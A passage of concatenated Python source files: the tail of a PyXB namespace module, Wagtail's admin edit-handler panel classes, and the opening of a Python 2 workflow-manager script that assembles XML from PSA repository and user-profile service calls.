, 'default_namespace' : self.__identifyNamespace(self.__contextDefaultNamespace)
, 'in_scope_namespaces' : isn }
self.__initialNamespaceContext = resolution.NamespaceContext(None, **kw)
return self.__initialNamespaceContext
def __identifyNamespace (self, nsval):
"""Identify the specified namespace, which should be a built-in.
Normally we can just use a reference to the Namespace module instance,
but when creating those instances we sometimes need to refer to ones
for which the instance has not yet been created. In that case, we use
the name of the instance, and resolve the namespace when we need to
create the initial context."""
if nsval is None:
return self
if isinstance(nsval, six.string_types):
nsval = globals().get(nsval)
if isinstance(nsval, Namespace):
return nsval
raise pyxb.LogicError('Cannot identify namespace from %s' % (nsval,))
def __str__ (self):
if self.__uri is None:
return 'AbsentNamespace%d' % (self.__absentNamespaceID,)
assert self.__uri is not None
if self.__boundPrefix is not None:
rv = '%s=%s' % (self.__boundPrefix, self.__uri)
else:
rv = self.__uri
return rv
from pyxb.namespace.builtin import XMLSchema_instance
from pyxb.namespace.builtin import XMLNamespaces
from pyxb.namespace.builtin import XMLSchema
from pyxb.namespace.builtin import XHTML
from pyxb.namespace.builtin import XML
from pyxb.namespace.builtin import XMLSchema_hfp
from pyxb.namespace.builtin import BuiltInObjectUID
resolution.NamespaceContext._AddTargetNamespaceAttribute(XMLSchema.createExpandedName('schema'), ExpandedName('targetNamespace'))
## Local Variables:
## fill-column:78
## End:
|
|
from __future__ import absolute_import, unicode_literals
import math
import re
import django
from django import forms
from django.core.exceptions import ImproperlyConfigured
from django.db.models.fields import FieldDoesNotExist
from django.forms.models import fields_for_model
from django.template.loader import render_to_string
from django.utils.functional import curry
from django.utils.safestring import mark_safe
from django.utils.six import text_type
from django.utils.translation import ugettext_lazy
from taggit.managers import TaggableManager
from wagtail.utils.decorators import cached_classmethod
from wagtail.wagtailadmin import compare, widgets
from wagtail.wagtailcore.models import Page
from wagtail.wagtailcore.utils import camelcase_to_underscore, resolve_model_string
# DIRECT_FORM_FIELD_OVERRIDES, FORM_FIELD_OVERRIDES are imported for backwards
# compatibility, as people are likely importing them from here and then
# appending their own overrides
from .forms import ( # NOQA
DIRECT_FORM_FIELD_OVERRIDES, FORM_FIELD_OVERRIDES, WagtailAdminModelForm, WagtailAdminPageForm,
formfield_for_dbfield)
def widget_with_script(widget, script):
return mark_safe('{0}<script>{1}</script>'.format(widget, script))
def get_form_for_model(
model, form_class=WagtailAdminModelForm,
fields=None, exclude=None, formsets=None, exclude_formsets=None, widgets=None
):
# django's modelform_factory with a bit of custom behaviour
attrs = {'model': model}
if fields is not None:
attrs['fields'] = fields
if exclude is not None:
attrs['exclude'] = exclude
if widgets is not None:
attrs['widgets'] = widgets
if formsets is not None:
attrs['formsets'] = formsets
if exclude_formsets is not None:
attrs['exclude_formsets'] = exclude_formsets
# Give this new form class a reasonable name.
class_name = model.__name__ + str('Form')
bases = (object,)
if hasattr(form_class, 'Meta'):
bases = (form_class.Meta,) + bases
form_class_attrs = {
'Meta': type(str('Meta'), bases, attrs)
}
metaclass = type(form_class)
return metaclass(class_name, (form_class,), form_class_attrs)
def extract_panel_definitions_from_model_class(model, exclude=None):
if hasattr(model, 'panels'):
return model.panels
panels = []
_exclude = []
if exclude:
_exclude.extend(exclude)
fields = fields_for_model(model, exclude=_exclude, formfield_callback=formfield_for_dbfield)
for field_name, field in fields.items():
try:
panel_class = field.widget.get_panel()
except AttributeError:
panel_class = FieldPanel
panel = panel_class(field_name)
panels.append(panel)
return panels
class EditHandler(object):
"""
Abstract class providing sensible default behaviours for objects implementing
the EditHandler API
"""
# return list of widget overrides that this EditHandler wants to be in place
# on the form it receives
@classmethod
def widget_overrides(cls):
return {}
# return list of fields that this EditHandler expects to find on the form
@classmethod
def required_fields(cls):
return []
# return a dict of formsets that this EditHandler requires to be present
# as children of the ClusterForm; the dict is a mapping from relation name
# to parameters to be passed as part of get_form_for_model's 'formsets' kwarg
@classmethod
def required_formsets(cls):
return {}
# return any HTML that needs to be output on the edit page once per edit handler definition.
# Typically this will be used to define snippets of HTML within <script type="text/x-template"></script> blocks
# for Javascript code to work with.
@classmethod
def html_declarations(cls):
return ''
def __init__(self, instance=None, form=None):
if not instance:
raise ValueError("EditHandler did not receive an instance object")
self.instance = instance
if not form:
raise ValueError("EditHandler did not receive a form object")
self.form = form
# Heading / help text to display to the user
heading = ""
help_text = ""
def classes(self):
"""
Additional CSS classnames to add to whatever kind of object this is at output.
Subclasses of EditHandler should override this, invoking super(B, self).classes() to
append more classes specific to the situation.
"""
classes = []
try:
classes.append(self.classname)
except AttributeError:
pass
return classes
def field_type(self):
"""
The kind of field it is e.g boolean_field. Useful for better semantic markup of field display based on type
"""
return ""
def id_for_label(self):
"""
The ID to be used as the 'for' attribute of any <label> elements that refer
to this object but are rendered outside of it. Leave blank if this object does not render
as a single input field.
"""
return ""
def render_as_object(self):
"""
Render this object as it should appear within an ObjectList. Should not
include the <h2> heading or help text - ObjectList will supply those
"""
# by default, assume that the subclass provides a catch-all render() method
return self.render()
def render_as_field(self):
"""
Render this object as it should appear within a <ul class="fields"> list item
"""
# by default, assume that the subclass provides a catch-all render() method
return self.render()
def render_missing_fields(self):
"""
Helper function: render all of the fields that are defined on the form but not "claimed" by
any panels via required_fields. These fields are most likely to be hidden fields introduced
by the forms framework itself, such as ORDER / DELETE fields on formset members.
(If they aren't actually hidden fields, then they will appear as ugly unstyled / label-less fields
outside of the panel furniture. But there's not much we can do about that.)
"""
rendered_fields = self.required_fields()
missing_fields_html = [
text_type(self.form[field_name])
for field_name in self.form.fields
if field_name not in rendered_fields
]
return mark_safe(''.join(missing_fields_html))
def render_form_content(self):
"""
Render this as an 'object', ensuring that all fields necessary for a valid form
submission are included
"""
return mark_safe(self.render_as_object() + self.render_missing_fields())
@classmethod
def get_comparison(cls):
return []
class BaseCompositeEditHandler(EditHandler):
"""
Abstract class for EditHandlers that manage a set of sub-EditHandlers.
Concrete subclasses must attach a 'children' property
"""
_widget_overrides = None
@classmethod
def widget_overrides(cls):
if cls._widget_overrides is None:
# build a collated version of all its children's widget lists
widgets = {}
for handler_class in cls.children:
widgets.update(handler_class.widget_overrides())
cls._widget_overrides = widgets
return cls._widget_overrides
_required_fields = None
@classmethod
def required_fields(cls):
if cls._required_fields is None:
fields = []
for handler_class in cls.children:
fields.extend(handler_class.required_fields())
cls._required_fields = fields
return cls._required_fields
_required_formsets = None
@classmethod
def required_formsets(cls):
if cls._required_formsets is None:
formsets = {}
for handler_class in cls.children:
formsets.update(handler_class.required_formsets())
cls._required_formsets = formsets
return cls._required_formsets
@classmethod
def html_declarations(cls):
return mark_safe(''.join([c.html_declarations() for c in cls.children]))
def __init__(self, instance=None, form=None):
super(BaseCompositeEditHandler, self).__init__(instance=instance, form=form)
self.children = []
for child in self.__class__.children:
if not getattr(child, "children", None) and getattr(child, "field_name", None):
if self.form._meta.exclude:
if child.field_name in self.form._meta.exclude:
continue
if self.form._meta.fields:
if child.field_name not in self.form._meta.fields:
continue
self.children.append(child(instance=self.instance, form=self.form))
def render(self):
return mark_safe(render_to_string(self.template, {
'self': self
}))
@classmethod
def get_comparison(cls):
comparators = []
for child in cls.children:
comparators.extend(child.get_comparison())
return comparators
class BaseFormEditHandler(BaseCompositeEditHandler):
"""
Base class for edit handlers that can construct a form class for all their
child edit handlers.
"""
# The form class used as the base for constructing specific forms for this
# edit handler. Subclasses can override this attribute to provide a form
# with custom validation, for example. Custom forms must subclass
# WagtailAdminModelForm
base_form_class = None
_form_class = None
@classmethod
def get_form_class(cls, model):
"""
Construct a form class that has all the fields and formsets named in
the children of this edit handler.
"""
if cls._form_class is None:
# If a custom form class was passed to the EditHandler, use it.
# Otherwise, use the base_form_class from the model.
# If that is not defined, use WagtailAdminModelForm.
model_form_class = getattr(model, 'base_form_class', WagtailAdminModelForm)
base_form_class = cls.base_form_class or model_form_class
cls._form_class = get_form_for_model(
model,
form_class=base_form_class,
fields=cls.required_fields(),
formsets=cls.required_formsets(),
widgets=cls.widget_overrides())
return cls._form_class
class BaseTabbedInterface(BaseFormEditHandler):
template = "wagtailadmin/edit_handlers/tabbed_interface.html"
class TabbedInterface(object):
def __init__(self, children, base_form_class=None):
self.children = children
self.base_form_class = base_form_class
def bind_to_model(self, model):
return type(str('_TabbedInterface'), (BaseTabbedInterface,), {
'model': model,
'children': [child.bind_to_model(model) for child in self.children],
'base_form_class': self.base_form_class,
})
class BaseObjectList(BaseFormEditHandler):
template = "wagtailadmin/edit_handlers/object_list.html"
class ObjectList(object):
def __init__(self, children, heading="", classname="",
base_form_class=None):
self.children = children
self.heading = heading
self.classname = classname
self.base_form_class = base_form_class
def bind_to_model(self, model):
return type(str('_ObjectList'), (BaseObjectList,), {
'model': model,
'children': [child.bind_to_model(model) for child in self.children],
'heading': self.heading,
'classname': self.classname,
'base_form_class': self.base_form_class,
})
class BaseFieldRowPanel(BaseCompositeEditHandler):
template = "wagtailadmin/edit_handlers/field_row_panel.html"
class FieldRowPanel(object):
def __init__(self, children, classname=""):
self.children = children
self.classname = classname
def bind_to_model(self, model):
col_count = " col" + str(int(math.floor(12 / len(self.children))))
# If child panel doesn't have a col# class then append default based on
# number of columns
for child in self.children:
if not re.search(r'\bcol\d+\b', child.classname):
child.classname += col_count
return type(str('_FieldRowPanel'), (BaseFieldRowPanel,), {
'model': model,
'children': [child.bind_to_model(model) for child in self.children],
'classname': self.classname,
})
class BaseMultiFieldPanel(BaseCompositeEditHandler):
template = "wagtailadmin/edit_handlers/multi_field_panel.html"
def classes(self):
classes = super(BaseMultiFieldPanel, self).classes()
classes.append("multi-field")
return classes
class MultiFieldPanel(object):
def __init__(self, children, heading="", classname=""):
self.children = children
self.heading = heading
self.classname = classname
def bind_to_model(self, model):
return type(str('_MultiFieldPanel'), (BaseMultiFieldPanel,), {
'model': model,
'children': [child.bind_to_model(model) for child in self.children],
'heading': self.heading,
'classname': self.classname,
})
class BaseFieldPanel(EditHandler):
TEMPLATE_VAR = 'field_panel'
@classmethod
def widget_overrides(cls):
"""check if a specific widget has been defined for this field"""
if hasattr(cls, 'widget'):
return {cls.field_name: cls.widget}
else:
return {}
def __init__(self, instance=None, form=None):
super(BaseFieldPanel, self).__init__(instance=instance, form=form)
self.bound_field = self.form[self.field_name]
self.heading = self.bound_field.label
self.help_text = self.bound_field.help_text
def classes(self):
classes = super(BaseFieldPanel, self).classes()
if self.bound_field.field.required:
classes.append("required")
if self.bound_field.errors:
classes.append("error")
classes.append(self.field_type())
return classes
def field_type(self):
return camelcase_to_underscore(self.bound_field.field.__class__.__name__)
def id_for_label(self):
return self.bound_field.id_for_label
object_template = "wagtailadmin/edit_handlers/single_field_panel.html"
def render_as_object(self):
return mark_safe(render_to_string(self.object_template, {
'self': self,
self.TEMPLATE_VAR: self,
'field': self.bound_field,
}))
field_template = "wagtailadmin/edit_handlers/field_panel_field.html"
def render_as_field(self):
context = {
'field': self.bound_field,
'field_type': self.field_type(),
}
return mark_safe(render_to_string(self.field_template, context))
@classmethod
def required_fields(cls):
return [cls.field_name]
@classmethod
def get_comparison_class(cls):
# Hide fields with hidden widget
widget_override = cls.widget_overrides().get(cls.field_name, None)
if widget_override and widget_override.is_hidden:
return
try:
field = cls.model._meta.get_field(cls.field_name)
if field.choices:
return compare.ChoiceFieldComparison
if field.is_relation:
if isinstance(field, TaggableManager):
return compare.TagsFieldComparison
elif field.many_to_many:
return compare.M2MFieldComparison
return compare.ForeignObjectComparison
if field.get_internal_type() in ['CharField', 'TextField']:
return compare.RichTextFieldComparison
except FieldDoesNotExist:
pass
return compare.FieldComparison
@classmethod
def get_comparison(cls):
comparator_class = cls.get_comparison_class()
if comparator_class:
field = cls.model._meta.get_field(cls.field_name)
return [curry(comparator_class, field)]
else:
return []
class FieldPanel(object):
def __init__(self, field_name, classname="", widget=None):
self.field_name = field_name
self.classname = classname
self.widget = widget
def bind_to_model(self, model):
base = {
'model': model,
'field_name': self.field_name,
'classname': self.classname,
}
if self.widget:
base['widget'] = self.widget
return type(str('_FieldPanel'), (BaseFieldPanel,), base)
class BaseRichTextFieldPanel(BaseFieldPanel):
@classmethod
def get_comparison_class(cls):
return compare.RichTextFieldComparison
class RichTextFieldPanel(object):
def __init__(self, field_name):
self.field_name = field_name
def bind_to_model(self, model):
return type(str('_RichTextFieldPanel'), (BaseRichTextFieldPanel,), {
'model': model,
'field_name': self.field_name,
})
class BaseChooserPanel(BaseFieldPanel):
"""
Abstract superclass for panels that provide a modal interface for choosing (or creating)
a database object such as an image, resulting in an ID that is used to populate
a hidden foreign key input.
Subclasses provide:
* field_template (only required if the default template of field_panel_field.html is not usable)
* object_type_name - something like 'image' which will be used as the var name
for the object instance in the field_template
"""
def get_chosen_item(self):
field = self.instance._meta.get_field(self.field_name)
related_model = field.rel.model
try:
return getattr(self.instance, self.field_name)
except related_model.DoesNotExist:
# if the ForeignKey is null=False, Django decides to raise
# a DoesNotExist exception here, rather than returning None
# like every other unpopulated field type. Yay consistency!
return None
def render_as_field(self):
instance_obj = self.get_chosen_item()
context = {
'field': self.bound_field,
self.object_type_name: instance_obj,
'is_chosen': bool(instance_obj), # DEPRECATED - passed to templates for backwards compatibility only
}
return mark_safe(render_to_string(self.field_template, context))
class BasePageChooserPanel(BaseChooserPanel):
object_type_name = "page"
@classmethod
def widget_overrides(cls):
return {cls.field_name: widgets.AdminPageChooser(
target_models=cls.target_models(),
can_choose_root=cls.can_choose_root)}
@cached_classmethod
def target_models(cls):
if cls.page_type:
target_models = []
for page_type in cls.page_type:
try:
target_models.append(resolve_model_string(page_type))
except LookupError:
raise ImproperlyConfigured(
"{0}.page_type must be of the form 'app_label.model_name', given {1!r}".format(
cls.__name__, page_type
)
)
except ValueError:
raise ImproperlyConfigured(
"{0}.page_type refers to model {1!r} that has not been installed".format(
cls.__name__, page_type
)
)
return target_models
else:
return [cls.model._meta.get_field(cls.field_name).rel.to]
class PageChooserPanel(object):
def __init__(self, field_name, page_type=None, can_choose_root=False):
self.field_name = field_name
if page_type:
# Convert single string/model into list
if not isinstance(page_type, (list, tuple)):
page_type = [page_type]
else:
page_type = []
self.page_type = page_type
self.can_choose_root = can_choose_root
def bind_to_model(self, model):
return type(str('_PageChooserPanel'), (BasePageChooserPanel,), {
'model': model,
'field_name': self.field_name,
'page_type': self.page_type,
'can_choose_root': self.can_choose_root,
})
class BaseInlinePanel(EditHandler):
@classmethod
def get_panel_definitions(cls):
# Look for a panels definition in the InlinePanel declaration
if cls.panels is not None:
return cls.panels
# Failing that, get it from the model
else:
return extract_panel_definitions_from_model_class(
cls.related.related_model,
exclude=[cls.related.field.name]
)
_child_edit_handler_class = None
@classmethod
def get_child_edit_handler_class(cls):
if cls._child_edit_handler_class is None:
panels = cls.get_panel_definitions()
cls._child_edit_handler_class = MultiFieldPanel(
panels,
heading=cls.heading
).bind_to_model(cls.related.related_model)
return cls._child_edit_handler_class
@classmethod
def required_formsets(cls):
child_edit_handler_class = cls.get_child_edit_handler_class()
return {
cls.relation_name: {
'fields': child_edit_handler_class.required_fields(),
'widgets': child_edit_handler_class.widget_overrides(),
'min_num': cls.min_num,
'validate_min': cls.min_num is not None,
'max_num': cls.max_num,
'validate_max': cls.max_num is not None
}
}
@classmethod
def html_declarations(cls):
return cls.get_child_edit_handler_class().html_declarations()
@classmethod
def get_comparison(cls):
field = cls.model._meta.get_field(cls.relation_name)
field_comparisons = []
for panel in cls.get_panel_definitions():
field_comparisons.extend(panel.bind_to_model(cls.related.related_model).get_comparison())
return [curry(compare.ChildRelationComparison, field, field_comparisons)]
def __init__(self, instance=None, form=None):
super(BaseInlinePanel, self).__init__(instance=instance, form=form)
self.formset = form.formsets[self.__class__.relation_name]
child_edit_handler_class = self.__class__.get_child_edit_handler_class()
self.children = []
for subform in self.formset.forms:
# override the DELETE field to have a hidden input
subform.fields['DELETE'].widget = forms.HiddenInput()
# ditto for the ORDER field, if present
if self.formset.can_order:
subform.fields['ORDER'].widget = forms.HiddenInput()
self.children.append(
child_edit_handler_class(instance=subform.instance, form=subform)
)
# if this formset is valid, it may have been re-ordered; respect that
# in case the parent form errored and we need to re-render
if self.formset.can_order and self.formset.is_valid():
self.children = sorted(self.children, key=lambda x: x.form.cleaned_data['ORDER'])
empty_form = self.formset.empty_form
empty_form.fields['DELETE'].widget = forms.HiddenInput()
if self.formset.can_order:
empty_form.fields['ORDER'].widget = forms.HiddenInput()
self.empty_child = child_edit_handler_class(instance=empty_form.instance, form=empty_form)
template = "wagtailadmin/edit_handlers/inline_panel.html"
def render(self):
formset = render_to_string(self.template, {
'self': self,
'can_order': self.formset.can_order,
})
js = self.render_js_init()
return widget_with_script(formset, js)
js_template = "wagtailadmin/edit_handlers/inline_panel.js"
def render_js_init(self):
return mark_safe(render_to_string(self.js_template, {
'self': self,
'can_order': self.formset.can_order,
}))
class InlinePanel(object):
def __init__(self, relation_name, panels=None, classname='', label='', help_text='', min_num=None, max_num=None):
self.relation_name = relation_name
self.panels = panels
self.label = label
self.help_text = help_text
self.min_num = min_num
self.max_num = max_num
self.classname = classname
def bind_to_model(self, model):
if django.VERSION >= (1, 9):
related = getattr(model, self.relation_name).rel
else:
related = getattr(model, self.relation_name).related
return type(str('_InlinePanel'), (BaseInlinePanel,), {
'model': model,
'relation_name': self.relation_name,
'related': related,
'panels': self.panels,
'heading': self.label,
'help_text': self.help_text,
# TODO: can we pick this out of the foreign key definition as an alternative?
# (with a bit of help from the inlineformset object, as we do for label/heading)
'min_num': self.min_num,
'max_num': self.max_num,
'classname': self.classname,
})
# This allows users to include the publishing panel in their own per-model override
# without having to write these fields out by hand, potentially losing 'classname'
# and therefore the associated styling of the publishing panel
def PublishingPanel():
return MultiFieldPanel([
FieldRowPanel([
FieldPanel('go_live_at'),
FieldPanel('expire_at'),
], classname="label-above"),
], ugettext_lazy('Scheduled publishing'), classname="publishing")
# Now that we've defined EditHandlers, we can set up wagtailcore.Page to have some.
Page.content_panels = [
FieldPanel('title', classname="full title"),
]
Page.promote_panels = [
MultiFieldPanel([
FieldPanel('slug'),
FieldPanel('seo_title'),
FieldPanel('show_in_menus'),
FieldPanel('search_description'),
], ugettext_lazy('Common page configuration')),
]
Page.settings_panels = [
PublishingPanel()
]
Page.base_form_class = WagtailAdminPageForm
@cached_classmethod
def get_edit_handler(cls):
"""
Get the EditHandler to use in the Wagtail admin when editing this page type.
"""
if hasattr(cls, 'edit_handler'):
return cls.edit_handler.bind_to_model(cls)
# construct a TabbedInterface made up of content_panels, promote_panels
# and settings_panels, skipping any which are empty
tabs = []
if cls.content_panels:
tabs.append(ObjectList(cls.content_panels, heading=ugettext_lazy('Content')))
if cls.promote_panels:
tabs.append(ObjectList(cls.promote_panels, heading=ugettext_lazy('Promote')))
if cls.settings_panels:
tabs.append(ObjectList(cls.settings_panels, heading=ugettext_lazy('Settings'), classname="settings"))
EditHandler = TabbedInterface(tabs, base_form_class=cls.base_form_class)
return EditHandler.bind_to_model(cls)
Page.get_edit_handler = get_edit_handler
class BaseStreamFieldPanel(BaseFieldPanel):
def classes(self):
classes = super(BaseStreamFieldPanel, self).classes()
classes.append("stream-field")
# In case of a validation error, BlockWidget will take care of outputting the error on the
# relevant sub-block, so we don't want the stream block as a whole to be wrapped in an 'error' class.
if 'error' in classes:
classes.remove("error")
return classes
@classmethod
def html_declarations(cls):
return cls.block_def.all_html_declarations()
@classmethod
def get_comparison_class(cls):
return compare.StreamFieldComparison
def id_for_label(self):
# a StreamField may consist of many input fields, so it's not meaningful to
# attach the label to any specific one
return ""
class StreamFieldPanel(object):
def __init__(self, field_name):
self.field_name = field_name
def bind_to_model(self, model):
return type(str('_StreamFieldPanel'), (BaseStreamFieldPanel,), {
'model': model,
'field_name': self.field_name,
'block_def': model._meta.get_field(self.field_name).stream_block
})
|
|
#
# The Offline workflow manager (WFM)
#
# Dependencies: pip install json2xml dicttoxml termcolor
#
# Formal usage: ./workflow_manager.py <username> <password/token> <upr_url> <spm_url> <psar_url>
# Example usage: ./workflow_manager.py adrian badpassword http://195.235.93.146:8081 130.192.225.109 http://195.235.93.146:8080
import json
import base64
import requests
import dicttoxml
import upr_client # SECURED component
import psarClient # SECURED component
import workflow_manager # SECURED component
import xml.etree.ElementTree as ET
from sys import argv
from time import sleep
from termcolor import colored
from lxml import etree, objectify
from lxml.etree import XMLSyntaxError
class WorkflowManager(object):
DEBUG = True
def dbprint(self, string):
if self.DEBUG == True:
print string
# Get the right PSA for the MSPL requirements
def get_psa_assoc(mspl):
f = open('xmlSchema/PSA_Review.xml', 'r')
psa_xml = f.read()
f.close()
mspl_capabilities = []
tree = ET.fromstring(mspl)
root = tree
for child in root:
for a in child:
if (str(a.tag).endswith("capability")):
for b in a:
mspl_capabilities.append(b.text)
tree = ET.fromstring(psa_xml)
root = tree
for child in root:
for a in child:
psa_name = a.attrib['name']
for b in a:
if str(b.tag).endswith("capability"):
psa_capabilities = []
right_psa = False
for c in b:
if str(c.tag).endswith("capability_list"):
psa_capabilities.append(c.text)
for mspl_cap in mspl_capabilities:
if mspl_cap in psa_capabilities:
right_psa = True
else:
right_psa = False
if right_psa == True:
return str(psa_name)
return None
# Extract the capabilities from an MSPL file and return as a list
def get_capability_from_mspl(self, mspl):
capabilities = ""
tree = ET.fromstring(mspl)
root = tree
for child in root:
for a in child:
if (str(a.tag).endswith("capability")):
for b in a:
print "Discovered capability: " + str(b.text)
capabilities = capabilities + str(b.text)
return capabilities
def get_subject_xml_file(self, upr_url):
upr = upr_client.UPRClient(str(upr_url))
r = upr.get_user_list()
if r.status_code != 200:
raise Exception("ERROR: Could not contact the UPR")
users = r.json()
output = "<?xml version='1.0' encoding='UTF-8'?>"
output += """<tns:associationList xmlns:tns='http://www.example.org/AssociationList'
xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
xsi:schemaLocation='http://www.example.org/AssociationList
../../java/schema/AssociationList_Schema.xsd '>"""
for user in users:
output += "<tns:associations Name='" + str(
user['user_id']) + "'><tns:IP ip_value='0.0.0.0/0.0.0.0'/></tns:associations>"
output += "</tns:associationList>"
return output
def get_market_psa_xml(self, user, psar_url):
# Why is this one line? His majesty, the SPM, gets very unhappy about whitespace. TODO: clean this up
xml = """<?xml version="1.0" encoding="UTF-8"?><tns:Mapping xmlns:tns="http://www.example.org/Refinement_Schema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.example.org/Refinement_Schema Refinement_Schema.xsd ">"""
psar = psarClient.Client(str(psar_url))
print "INFO: This normal user will have access to the full PSA catalogue"
print str(psar_url)
r = psar.get_image_list(is_generic=False)
if r.status_code != 200:
print "ERROR get_market_psa_xml: OH NO. When getting PSAs, the PSAR returned " + str(r.status_code)
raise Exception('No PSAs could be found')
psa_list = r.json()
# Where "psa" is the PSA_ID
xml += "<tns:psa_list>"
for psa in psa_list:
r = psar.get_psa_capabilities(psa['psa_id'])
if r.status_code == 200:
xml += '<tns:psa name="' + psa['psa_id'] + '">'
xml += '<tns:PSA_info />'
xml += '<tns:PSA_characteristic cost="' + str(psa['cost']) + '" latency="' + \
str(psa['latency']) + '" rating="' + str(psa['rating']) + '" />'
cap_list = r.json()['capabilities']
xml += '<tns:capability>'
for c in cap_list:
xml += '<tns:capability_list>' + c + '</tns:capability_list>'
xml += '</tns:capability>'
xml += '</tns:psa>'
else:
print colored(str(r.status_code) + " NO CAPABILITIES FOUND FOR PSA: " + str(psa), 'red')
xml += '</tns:psa_list></tns:Mapping>'
return xml
# Should collect slightly different input depending on if HSPL is given or an SG
def collectInput(self, refinement_type, hspl_xml, user_sg, user_psa_xml, psa_market_xml,
subject_xml, content_xml, target_xml, opt_profile_string, max_evals):
if user_sg == None:
print "ERROR: No service graph produced"
raise AssertionError
data = {}
data['refinement_type'] = str(refinement_type)
data['hspl_mspl'] = str(hspl_xml)
print str(hspl_xml)
data['sPSA_SG'] = str(user_sg)
data['user_PSA'] = str(user_psa_xml)
data['market_PSA'] = str(psa_market_xml)
data['subject_string'] = str(subject_xml)
data['content_string'] = str(content_xml)
data['target_string'] = str(target_xml)
data['optimizationType_string'] = str(opt_profile_string)
data['maxEvaluationsNo_string'] = str(max_evals)
parent_json = {}
parent_json['input'] = data
json_data = json.dumps(parent_json)
# Perform santisation to keep the SPM happy
json_data = json_data.replace("\\n", "")
json_data = json_data.replace("\\r", "")
json_data = json_data.replace("\\t", "")
json_data = json_data.replace("\\/", "")
return json_data
# Takes JSON and returns as an XML
def convertToXML(data):
obj = json.loads(data)
xml = dicttoxml.dicttoxml(obj)
return xml
# This should only be used by users of type NORMAL
# Returns an XML string
def convertPSAlist_normal(self, userID, upr_url, psar_url):
xml = """<?xml version="1.0" encoding="UTF-8"?>
<tns:Mapping xmlns:tns="http://www.example.org/Refinement_Schema"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.example.org/Refinement_Schema Refinement_Schema.xsd ">"""
psa_list = []
psar = psarClient.Client(str(psar_url))
upr = upr_client.UPRClient(str(upr_url))
r = upr.get_user_groups(userID)
data = r.json()
print "\n\n"
userGroups = r.json()
#self.dbprint("DEBUG: Here are the groups belonging to " + str(userID) + ": " + str(userGroups))
for g in userGroups:
print "Finding PSAs for group " + str(g)
r = upr.get_group_psa(g['group'])
if r.status_code != 200:
print "convertPSAlist: OH NO. When getting Group PSAs the UPR returned " + str(r.status_code)
else:
data = r.json()
print str(r.json())
for psa in data:
psa_list.append(str(psa['psa_id']))
# Debug function
print "Debug: Here are the PSAs of the group: "
for x in psa_list:
print " " + str(x) + " "
# The default for a normal user is to get the full PSAs from the PSA repository
# If the UPR group specifies a list of PSAs then that will override the following condition
if len(psa_list) == 0:
print "INFO: This normal user will have access to the full PSA catalogue"
r = psar.get_image_list(is_generic=False)
if r.status_code != 200:
print "ERROR convertPSAlist: OH NO. When getting PSAs, the PSAR returned " + str(r.status_code)
raise Exception('No PSAs could be found')
data = r.json()
for psa in data:
psa_list.append(str(psa['psa_id']))
print "INFO: There are " + str(len(psa_list)) + " PSAs in the PSAR"
xml += '<tns:psa_list>'
# Where "psa" is the PSA_ID
for psa in psa_list:
par = psar.get_psa_opt_par(psa)
par_data = psar.get_image_list(id=psa)
if par_data.status_code != 200:
print par_data.status_code
print "ERROR: No OPTIMISATION PROFILE FOUND FOR PSA: " + str(psa)
return
if len(par_data.json()) == 0:
print colored("ERROR: PSA not found: " + str(psa),'red')
return
par = par_data.json()[0] # PSA ID should be unique
latency = par['rating']
r = psar.get_psa_capabilities(psa)
if r.status_code == 200:
xml += '<tns:psa name="' + psa + '">'
xml += '<tns:PSA_info />'
xml += '<tns:PSA_characteristic cost="' + str(par['cost']) + '" latency="' + \
str(par['latency']) + '" rating="' + str(par['rating']) + '" />'
cap_list = r.json()['capabilities']
xml += '<tns:capability>'
for c in cap_list:
xml += '<tns:capability_list>' + c + '</tns:capability_list>'
xml += '</tns:capability>'
xml += '</tns:psa>'
else:
print colored(str(r.status_code) + " NO CAPABILITIES FOUND FOR PSA: " + str(psa), 'red')
xml += '</tns:psa_list></tns:Mapping>'
return xml
# This function concerns the SG definition and is used only
# for the expert and enthusiastic users, while for the normal
# user we have not the SG but only a list of PSAs (the new function).
# Result returns an XML...
# TODO: Rename this function to something more sensible
# New function developed by Fulvio Valenza
def convertSG(self, psa_list_json, mspl_psa_assoc, psar_url):
output = """<?xml version=\"1.0\" encoding=\"UTF-8\"?>
<tns:Mapping xmlns:tns=\"http://www.example.org/Refinement_Schema\"
xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"
xsi:schemaLocation=\"http://www.example.org/Refinement_Schema\">
<tns:service_graph>"""
max_number = len(psa_list_json)
psar = psarClient.Client(str(psar_url))
i = 0
for psa in psa_list_json:
mspl_id = []
r = psar.get_image_list(id=psa['psa_id'])
if r.status_code != 200:
print "ERROR getting PSA information: HTTP " + str(r.status_code)
continue
try:
thejson = r.json()[0]
generic = thejson['is_generic']
psa_id = thejson['psa_id']
order = psa['running_order'] # TODO: need to use this as the serviceID
except IndexError:
print "ERROR!!!: This PSA does not exist: " + str(psa['psa_id'])
continue
if generic == True:
print "Generic"
output += "<tns:service serviceID=\"id" + str(i) + "\" "
for a in mspl_psa_assoc:
if a['psa_id'] == psa_id:
output += ' MSPL_ID="' + str(a['mspl']) + "\""
output += ">"
capability_list = psar.get_psa_capabilities(psa_id)
for c in capability_list.json()['capabilities']:
output += "<tns:capability>" + c + "</tns:capability>"
# End generic
else:
print "Not generic"
output += "<tns:service serviceID=\"id" + str(i) + "\"> "
output += "<tns:PSA name=\"" + str(psa_id) + "\">"
output += "<tns:PSA_info />"
opt_par_r = psar.get_psa_opt_par(psa_id)
if opt_par_r.status_code != 200:
raise Exception("ERROR: No optimisation profile for this PSA ID: " + str(psa_id))
opt_par = opt_par_r.json()
output += "<tns:PSA_characteristic cost=\"" + str(opt_par['cost']) + "\" latency=\" " \
+ str(opt_par['latency']) + "\" rating=\"" + str(opt_par['rating']) + "\"/>"
# Build the capability tags
output += "<tns:capability>"
capability_list = psar.get_psa_capabilities(psa_id)
for c in capability_list.json()['capabilities']:
output += "<tns:capability_list>" + c + "</tns:capability_list>"
output += "</tns:capability>"
for a in mspl_psa_assoc:
if a['psa_id'] == psa_id:
mspl_id[:a['mspl']]
if len(mspl_id) > 0:
output += "<tns:MSPL_list>"
for mspl in mspl_id:
output += " <tns:mspl_list id=\"" + mspl + "\"/>"
output += "</tns:MSPL_list>"
output += "</tns:PSA>"
# End non-generic
output += "</tns:service>"
i = i + 1
output += " <tns:rootService>id0</tns:rootService>"
output += " <tns:endService>id" + str(max_number - 1) + "</tns:endService>"
i = 0
while (i < max_number - 1):
output += "<tns:edge>"
output += " <tns:src_Service>" + "id" + str(i) + "</tns:src_Service>"
